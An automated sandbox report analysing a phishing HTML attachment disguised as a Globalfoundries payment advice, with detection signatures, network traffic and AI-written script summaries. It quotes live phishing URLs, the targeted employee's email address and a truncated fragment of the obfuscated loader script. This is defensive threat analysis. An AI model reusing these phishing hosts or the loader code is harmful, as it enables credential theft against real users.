Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Globalfoundries eCHECK- Payment Advice.html

Overview

General Information

Sample name:Globalfoundries eCHECK- Payment Advice.html
Analysis ID:1585537
MD5:316d4d66916c435eef06def4eda10b9f
SHA1:00b8bcc07a36c61c85053bd00a80df7a245d6dda
SHA256:88256e97c27dff1b55e8c1941a489c5670ca7b870a10c8f6d298b51cabcde5d8
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
HTML file submission requesting Cloudflare captcha challenge
AI detected suspicious Javascript
Detected javascript redirector / loader
HTML document with suspicious name
HTML document with suspicious title
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64
  • chrome.exe (PID: 4040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Globalfoundries eCHECK- Payment Advice.html" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 6872 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2484,i,4524059451973994455,11659315058774939234,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://7x8x.digitalvoyage.ru/xaxb/#Z#Xandrew.snow@globalfoundries.comSlashNext: Label: Credential Stealing type: Phishing & Social usering
Source: https://7x8x.digitalvoyage.ru/xaxb/Avira URL Cloud: Label: phishing
Source: https://7x8x.digitalvoyage.ru/favicon.icoAvira URL Cloud: Label: phishing

Phishing

barindex
Source: 0.5.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://7x8x.digitalvoyage.ru/xaxb/#Z#Xandrew.snow... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser developer tools, and redirecting the user to a suspicious domain. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of phishing or other malicious activities.
Source: 0.6.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://7x8x.digitalvoyage.ru/xaxb/#Z#Xandrew.snow... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a Microsoft login page, which is likely a phishing attempt. Overall, this script demonstrates highly suspicious and malicious behavior, posing a significant security risk.
Source: 0.1.i.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/Globalfoundries%... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to a suspicious domain. The use of obfuscated URLs and the aggressive manipulation of the DOM further increase the risk. While the script's intent is not entirely clear, the combination of these factors suggests a high likelihood of malicious activity, such as a phishing or credential theft attempt.
Source: 0.4.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://7x8x.digitalvoyage.ru/xaxb/#Z#Xandrew.snow... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent.
Source: 1.2..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://futureslocal.com/res444.php?2-68747470733a... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code. While the script appears to be using legitimate cryptographic libraries, the overall behavior and lack of transparency raise significant security concerns.
Source: Globalfoundries eCHECK- Payment Advice.htmlHTTP Parser: Low number of body elements: 0
Source: file:///C:/Users/user/Desktop/Globalfoundries%20eCHECK-%20Payment%20Advice.htmlTab title: Globalfoundries eCHECK- Payment Advice.html
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718725627840572.NDMyYjk1NTAtMDgxOC00ZWQwLWFiZmMtYzdlYWEzNDBiMTgxYzE4YmM5YWUtYmYyOS00YTUyLWJhYmMtYzM4ZDZlMzM1OTI2&ui_locales=en-US&mkt=en-US&client-request-id=e7294415-ebb8-4c6c-a721-59addb06489f&state=vXT-mAxQB-uDmEbP3ioGogJIBGvZcmftV-Ks0nlk9NyX2z7bOqZYGWUbia6zOG4Nw39xkm1hMxZp9ct7hzd85hLENOKYTH3mvuktzfeFoR3bnj3tLaTQhpecmA2PdLREvRmCjPptWIljysf3IUrZhNQHW2fn40V7iCqmcp5TKKRwoo961Bn0SRmQUUmMtd1MLgWnRubux0x_RBG2dmvkp52TMha5JDATfM5ZxC5f0x8GxcBSOUmo2qoubBD5X3UOcVjWi7DLy8wPD-mUcQ3ygQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718725627840572.NDMyYjk1NTAtMDgxOC00ZWQwLWFiZmMtYzdlYWEzNDBiMTgxYzE4YmM5YWUtYmYyOS00YTUyLWJhYmMtYzM4ZDZlMzM1OTI2&ui_locales=en-US&mkt=en-US&client-request-id=e7294415-ebb8-4c6c-a721-59addb06489f&state=vXT-mAxQB-uDmEbP3ioGogJIBGvZcmftV-Ks0nlk9NyX2z7bOqZYGWUbia6zOG4Nw39xkm1hMxZp9ct7hzd85hLENOKYTH3mvuktzfeFoR3bnj3tLaTQhpecmA2PdLREvRmCjPptWIljysf3IUrZhNQHW2fn40V7iCqmcp5TKKRwoo961Bn0SRmQUUmMtd1MLgWnRubux0x_RBG2dmvkp52TMha5JDATfM5ZxC5f0x8GxcBSOUmo2qoubBD5X3UOcVjWi7DLy8wPD-mUcQ3ygQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718725627840572.NDMyYjk1NTAtMDgxOC00ZWQwLWFiZmMtYzdlYWEzNDBiMTgxYzE4YmM5YWUtYmYyOS00YTUyLWJhYmMtYzM4ZDZlMzM1OTI2&ui_locales=en-US&mkt=en-US&client-request-id=e7294415-ebb8-4c6c-a721-59addb06489f&state=vXT-mAxQB-uDmEbP3ioGogJIBGvZcmftV-Ks0nlk9NyX2z7bOqZYGWUbia6zOG4Nw39xkm1hMxZp9ct7hzd85hLENOKYTH3mvuktzfeFoR3bnj3tLaTQhpecmA2PdLREvRmCjPptWIljysf3IUrZhNQHW2fn40V7iCqmcp5TKKRwoo961Bn0SRmQUUmMtd1MLgWnRubux0x_RBG2dmvkp52TMha5JDATfM5ZxC5f0x8GxcBSOUmo2qoubBD5X3UOcVjWi7DLy8wPD-mUcQ3ygQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: 432b9550-0818-4ed0-abfc-c7eaa340b181c18bc9ae-bf29-4a52-babc-c38d6e335926
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718725627840572.NDMyYjk1NTAtMDgxOC00ZWQwLWFiZmMtYzdlYWEzNDBiMTgxYzE4YmM5YWUtYmYyOS00YTUyLWJhYmMtYzM4ZDZlMzM1OTI2&ui_locales=en-US&mkt=en-US&client-request-id=e7294415-ebb8-4c6c-a721-59addb06489f&state=vXT-mAxQB-uDmEbP3ioGogJIBGvZcmftV-Ks0nlk9NyX2z7bOqZYGWUbia6zOG4Nw39xkm1hMxZp9ct7hzd85hLENOKYTH3mvuktzfeFoR3bnj3tLaTQhpecmA2PdLREvRmCjPptWIljysf3IUrZhNQHW2fn40V7iCqmcp5TKKRwoo961Bn0SRmQUUmMtd1MLgWnRubux0x_RBG2dmvkp52TMha5JDATfM5ZxC5f0x8GxcBSOUmo2qoubBD5X3UOcVjWi7DLy8wPD-mUcQ3ygQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718725627840572.NDMyYjk1NTAtMDgxOC00ZWQwLWFiZmMtYzdlYWEzNDBiMTgxYzE4YmM5YWUtYmYyOS00YTUyLWJhYmMtYzM4ZDZlMzM1OTI2&ui_locales=en-US&mkt=en-US&client-request-id=e7294415-ebb8-4c6c-a721-59addb06489f&state=vXT-mAxQB-uDmEbP3ioGogJIBGvZcmftV-Ks0nlk9NyX2z7bOqZYGWUbia6zOG4Nw39xkm1hMxZp9ct7hzd85hLENOKYTH3mvuktzfeFoR3bnj3tLaTQhpecmA2PdLREvRmCjPptWIljysf3IUrZhNQHW2fn40V7iCqmcp5TKKRwoo961Bn0SRmQUUmMtd1MLgWnRubux0x_RBG2dmvkp52TMha5JDATfM5ZxC5f0x8GxcBSOUmo2qoubBD5X3UOcVjWi7DLy8wPD-mUcQ3ygQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://futureslocal.com/res444.php?2-68747470733a2f2f375838782e6469676974616c766f796167652e72752f786178622f-scorpionHTTP Parser: var jjnxhboiiqdugclh = document.createelement("script");jjnxhboiiqdugclh.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(jjnxhboiiqdugclh);jjnxhboiiqdugclh.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoiqkp1muvmnxa5svlrckg2anrpttdwk2j1ek5hwhpremtaslpimmfjbg5ysmzad2pewkpns0x6otv4s0rbz2fimwpewk05n3vrsjbdvfn0dejrttduzxfjvnlcsujet3hndm0zn3mwt0uwvhn5bxq1k2hsk2tkwe5rsnq3sevysxbstzncl1lzoup0ugtna0dumk1qzw84vlf1beg4dnfxdemrq29hywlvu3zva1j1ofpuwjr0v3fzt2tjd0xhnkord2fqtkjzuuhmugjkslwvwww2awx4odnyeedobtbmwggywfwvtmpocxluewnsr2zaqnzltkmrzfnlckh4zefpnytrcjzjwhhxbwjxdglhellhwwzldvhzmku0ofrtzxu3dke0r0ntwkk0z3r5t01ys1v3szjcl3vyz0i5dmdhajdkse5ycxbyqtrenm5aazr2whlvvw5ivgn5qk9svwzvrwvznk5dc2gxwdywbxfksepmd3z1nnjwy1qzaxcrm2qxvlzwafhxr1lnehvuz0nwtgk5cwlquwjwb3foznbetjjexc9qavniz2c1ellzdlhfaxh5qwsys1leqveyb29obtnxzhhnrwt2n01ynwlkczi4cue0xc8zakvtogpbbm9vz3pgytd4tfg2cgzav3lpd2s5z0g4mng2thqyy2nrmfzkwljcsgq2ntdwqkyrthzizkjlski3v0srzza2q3jqbkrket...
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718725627840572.NDMyYjk1NTAtMDgxOC00ZWQwLWFiZmMtYzdlYWEzNDBiMTgxYzE4YmM5YWUtYmYyOS00YTUyLWJhYmMtYzM4ZDZlMzM1OTI2&ui_locales=en-US&mkt=en-US&client-request-id=e7294415-ebb8-4c6c-a721-59addb06489f&state=vXT-mAxQB-uDmEbP3ioGogJIBGvZcmftV-Ks0nlk9NyX2z7bOqZYGWUbia6zOG4Nw39xkm1hMxZp9ct7hzd85hLENOKYTH3mvuktzfeFoR3bnj3tLaTQhpecmA2PdLREvRmCjPptWIljysf3IUrZhNQHW2fn40V7iCqmcp5TKKRwoo961Bn0SRmQUUmMtd1MLgWnRubux0x_RBG2dmvkp52TMha5JDATfM5ZxC5f0x8GxcBSOUmo2qoubBD5X3UOcVjWi7DLy8wPD-mUcQ3ygQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: Globalfoundries eCHECK- Payment Advice.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Globalfoundries%20eCHECK-%20Payment%20Advice.htmlHTTP Parser: No favicon
Source: https://7x8x.digitalvoyage.ru/xaxb/#Z#Xandrew.snow@globalfoundries.comHTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718725627840572.NDMyYjk1NTAtMDgxOC00ZWQwLWFiZmMtYzdlYWEzNDBiMTgxYzE4YmM5YWUtYmYyOS00YTUyLWJhYmMtYzM4ZDZlMzM1OTI2&ui_locales=en-US&mkt=en-US&client-request-id=e7294415-ebb8-4c6c-a721-59addb06489f&state=vXT-mAxQB-uDmEbP3ioGogJIBGvZcmftV-Ks0nlk9NyX2z7bOqZYGWUbia6zOG4Nw39xkm1hMxZp9ct7hzd85hLENOKYTH3mvuktzfeFoR3bnj3tLaTQhpecmA2PdLREvRmCjPptWIljysf3IUrZhNQHW2fn40V7iCqmcp5TKKRwoo961Bn0SRmQUUmMtd1MLgWnRubux0x_RBG2dmvkp52TMha5JDATfM5ZxC5f0x8GxcBSOUmo2qoubBD5X3UOcVjWi7DLy8wPD-mUcQ3ygQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718725627840572.NDMyYjk1NTAtMDgxOC00ZWQwLWFiZmMtYzdlYWEzNDBiMTgxYzE4YmM5YWUtYmYyOS00YTUyLWJhYmMtYzM4ZDZlMzM1OTI2&ui_locales=en-US&mkt=en-US&client-request-id=e7294415-ebb8-4c6c-a721-59addb06489f&state=vXT-mAxQB-uDmEbP3ioGogJIBGvZcmftV-Ks0nlk9NyX2z7bOqZYGWUbia6zOG4Nw39xkm1hMxZp9ct7hzd85hLENOKYTH3mvuktzfeFoR3bnj3tLaTQhpecmA2PdLREvRmCjPptWIljysf3IUrZhNQHW2fn40V7iCqmcp5TKKRwoo961Bn0SRmQUUmMtd1MLgWnRubux0x_RBG2dmvkp52TMha5JDATfM5ZxC5f0x8GxcBSOUmo2qoubBD5X3UOcVjWi7DLy8wPD-mUcQ3ygQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718725627840572.NDMyYjk1NTAtMDgxOC00ZWQwLWFiZmMtYzdlYWEzNDBiMTgxYzE4YmM5YWUtYmYyOS00YTUyLWJhYmMtYzM4ZDZlMzM1OTI2&ui_locales=en-US&mkt=en-US&client-request-id=e7294415-ebb8-4c6c-a721-59addb06489f&state=vXT-mAxQB-uDmEbP3ioGogJIBGvZcmftV-Ks0nlk9NyX2z7bOqZYGWUbia6zOG4Nw39xkm1hMxZp9ct7hzd85hLENOKYTH3mvuktzfeFoR3bnj3tLaTQhpecmA2PdLREvRmCjPptWIljysf3IUrZhNQHW2fn40V7iCqmcp5TKKRwoo961Bn0SRmQUUmMtd1MLgWnRubux0x_RBG2dmvkp52TMha5JDATfM5ZxC5f0x8GxcBSOUmo2qoubBD5X3UOcVjWi7DLy8wPD-mUcQ3ygQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718725627840572.NDMyYjk1NTAtMDgxOC00ZWQwLWFiZmMtYzdlYWEzNDBiMTgxYzE4YmM5YWUtYmYyOS00YTUyLWJhYmMtYzM4ZDZlMzM1OTI2&ui_locales=en-US&mkt=en-US&client-request-id=e7294415-ebb8-4c6c-a721-59addb06489f&state=vXT-mAxQB-uDmEbP3ioGogJIBGvZcmftV-Ks0nlk9NyX2z7bOqZYGWUbia6zOG4Nw39xkm1hMxZp9ct7hzd85hLENOKYTH3mvuktzfeFoR3bnj3tLaTQhpecmA2PdLREvRmCjPptWIljysf3IUrZhNQHW2fn40V7iCqmcp5TKKRwoo961Bn0SRmQUUmMtd1MLgWnRubux0x_RBG2dmvkp52TMha5JDATfM5ZxC5f0x8GxcBSOUmo2qoubBD5X3UOcVjWi7DLy8wPD-mUcQ3ygQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718725627840572.NDMyYjk1NTAtMDgxOC00ZWQwLWFiZmMtYzdlYWEzNDBiMTgxYzE4YmM5YWUtYmYyOS00YTUyLWJhYmMtYzM4ZDZlMzM1OTI2&ui_locales=en-US&mkt=en-US&client-request-id=e7294415-ebb8-4c6c-a721-59addb06489f&state=vXT-mAxQB-uDmEbP3ioGogJIBGvZcmftV-Ks0nlk9NyX2z7bOqZYGWUbia6zOG4Nw39xkm1hMxZp9ct7hzd85hLENOKYTH3mvuktzfeFoR3bnj3tLaTQhpecmA2PdLREvRmCjPptWIljysf3IUrZhNQHW2fn40V7iCqmcp5TKKRwoo961Bn0SRmQUUmMtd1MLgWnRubux0x_RBG2dmvkp52TMha5JDATfM5ZxC5f0x8GxcBSOUmo2qoubBD5X3UOcVjWi7DLy8wPD-mUcQ3ygQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718725627840572.NDMyYjk1NTAtMDgxOC00ZWQwLWFiZmMtYzdlYWEzNDBiMTgxYzE4YmM5YWUtYmYyOS00YTUyLWJhYmMtYzM4ZDZlMzM1OTI2&ui_locales=en-US&mkt=en-US&client-request-id=e7294415-ebb8-4c6c-a721-59addb06489f&state=vXT-mAxQB-uDmEbP3ioGogJIBGvZcmftV-Ks0nlk9NyX2z7bOqZYGWUbia6zOG4Nw39xkm1hMxZp9ct7hzd85hLENOKYTH3mvuktzfeFoR3bnj3tLaTQhpecmA2PdLREvRmCjPptWIljysf3IUrZhNQHW2fn40V7iCqmcp5TKKRwoo961Bn0SRmQUUmMtd1MLgWnRubux0x_RBG2dmvkp52TMha5JDATfM5ZxC5f0x8GxcBSOUmo2qoubBD5X3UOcVjWi7DLy8wPD-mUcQ3ygQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718725627840572.NDMyYjk1NTAtMDgxOC00ZWQwLWFiZmMtYzdlYWEzNDBiMTgxYzE4YmM5YWUtYmYyOS00YTUyLWJhYmMtYzM4ZDZlMzM1OTI2&ui_locales=en-US&mkt=en-US&client-request-id=e7294415-ebb8-4c6c-a721-59addb06489f&state=vXT-mAxQB-uDmEbP3ioGogJIBGvZcmftV-Ks0nlk9NyX2z7bOqZYGWUbia6zOG4Nw39xkm1hMxZp9ct7hzd85hLENOKYTH3mvuktzfeFoR3bnj3tLaTQhpecmA2PdLREvRmCjPptWIljysf3IUrZhNQHW2fn40V7iCqmcp5TKKRwoo961Bn0SRmQUUmMtd1MLgWnRubux0x_RBG2dmvkp52TMha5JDATfM5ZxC5f0x8GxcBSOUmo2qoubBD5X3UOcVjWi7DLy8wPD-mUcQ3ygQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718725627840572.NDMyYjk1NTAtMDgxOC00ZWQwLWFiZmMtYzdlYWEzNDBiMTgxYzE4YmM5YWUtYmYyOS00YTUyLWJhYmMtYzM4ZDZlMzM1OTI2&ui_locales=en-US&mkt=en-US&client-request-id=e7294415-ebb8-4c6c-a721-59addb06489f&state=vXT-mAxQB-uDmEbP3ioGogJIBGvZcmftV-Ks0nlk9NyX2z7bOqZYGWUbia6zOG4Nw39xkm1hMxZp9ct7hzd85hLENOKYTH3mvuktzfeFoR3bnj3tLaTQhpecmA2PdLREvRmCjPptWIljysf3IUrZhNQHW2fn40V7iCqmcp5TKKRwoo961Bn0SRmQUUmMtd1MLgWnRubux0x_RBG2dmvkp52TMha5JDATfM5ZxC5f0x8GxcBSOUmo2qoubBD5X3UOcVjWi7DLy8wPD-mUcQ3ygQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718725627840572.NDMyYjk1NTAtMDgxOC00ZWQwLWFiZmMtYzdlYWEzNDBiMTgxYzE4YmM5YWUtYmYyOS00YTUyLWJhYmMtYzM4ZDZlMzM1OTI2&ui_locales=en-US&mkt=en-US&client-request-id=e7294415-ebb8-4c6c-a721-59addb06489f&state=vXT-mAxQB-uDmEbP3ioGogJIBGvZcmftV-Ks0nlk9NyX2z7bOqZYGWUbia6zOG4Nw39xkm1hMxZp9ct7hzd85hLENOKYTH3mvuktzfeFoR3bnj3tLaTQhpecmA2PdLREvRmCjPptWIljysf3IUrZhNQHW2fn40V7iCqmcp5TKKRwoo961Bn0SRmQUUmMtd1MLgWnRubux0x_RBG2dmvkp52TMha5JDATfM5ZxC5f0x8GxcBSOUmo2qoubBD5X3UOcVjWi7DLy8wPD-mUcQ3ygQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49909 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50085 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50092 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50096 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
